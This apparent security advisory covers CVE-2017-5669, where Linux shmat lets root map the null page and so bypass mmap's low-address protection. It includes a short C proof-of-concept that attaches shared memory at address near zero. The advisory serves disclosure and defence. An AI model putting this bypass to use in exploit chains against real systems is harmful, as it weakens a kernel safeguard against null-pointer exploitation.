CVE-2017-5669: Shmat allows mmap null page protection bypass --[ 1. Overview The null page protection mechanisms implemented in shmat are not consistent with those in mmap and allow a privileged user to map the null page. When a privileged user attempts to mmap an address below 64k, it is treated as essentially passing a NULL value in the addr argument and returns a random address. With shmat, the root user is simply provided the address they requested, essentially bypassing this protection afforded by mmap. Please see attached proof of concept code. --[ 2. Proof of Concept #include #include #include #include #include #include #include #include #define LOCATION ((void*)1) int main(int argc, char* argv[]){ void *ptr = NULL; int hndl = 0; key_t key; printf("Attempting to mmap the null page\n"); ptr = mmap(LOCATION,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,0,0); printf("Mmap: %p\n",ptr); ((char*)ptr)[0] = 'A'; printf("Unmapping mmaped page\n"); munmap(ptr,4096); key = ftok(argv[0],'f'); printf("Allocating system-v shared memory\n"); if((hndl = shmget(key,4096,IPC_CREAT | 0777)) == -1){ perror("Error creating memory region\n"); return hndl; } printf("Attaching shared memory to null page\n"); ptr = shmat(hndl,LOCATION,SHM_RND); if( ptr == (void*)-1 ){ printf("Error attaching %s\n",strerror(errno)); } printf("Mapped to %p\n",ptr); ((char*)ptr)[0] = 'A'; printf("Unmapping page\n"); if(shmdt(ptr) == -1){ printf("Error detaching page %s\n",strerror(errno)); } return 0; }